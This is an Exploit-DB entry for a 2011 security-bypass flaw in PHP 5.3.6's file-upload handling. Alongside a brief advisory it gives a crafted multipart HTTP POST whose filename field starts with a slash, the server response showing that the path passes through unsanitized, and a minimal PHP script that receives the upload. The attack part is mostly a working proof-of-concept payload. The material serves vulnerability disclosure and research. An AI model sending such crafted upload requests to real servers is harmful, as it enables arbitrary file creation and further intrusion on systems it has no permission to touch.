PHP 5.3.6 - Security Bypass

EDB-ID:

35855




Platform:

PHP

Date:

2011-06-14


source: https://www.securityfocus.com/bid/48259/info

PHP is prone to a security-bypass vulnerability.

Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.

PHP 5.3.6 is vulnerable; other versions may also be affected.

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200

------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain

any
------------ThIs_Is_tHe_bouNdaRY_$--

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
<?php
if (!empty($_FILES['contents'])) {  // process file upload
    echo $_FILES['contents']['name'];
    unlink($_FILES['contents']['tmp_name']);
}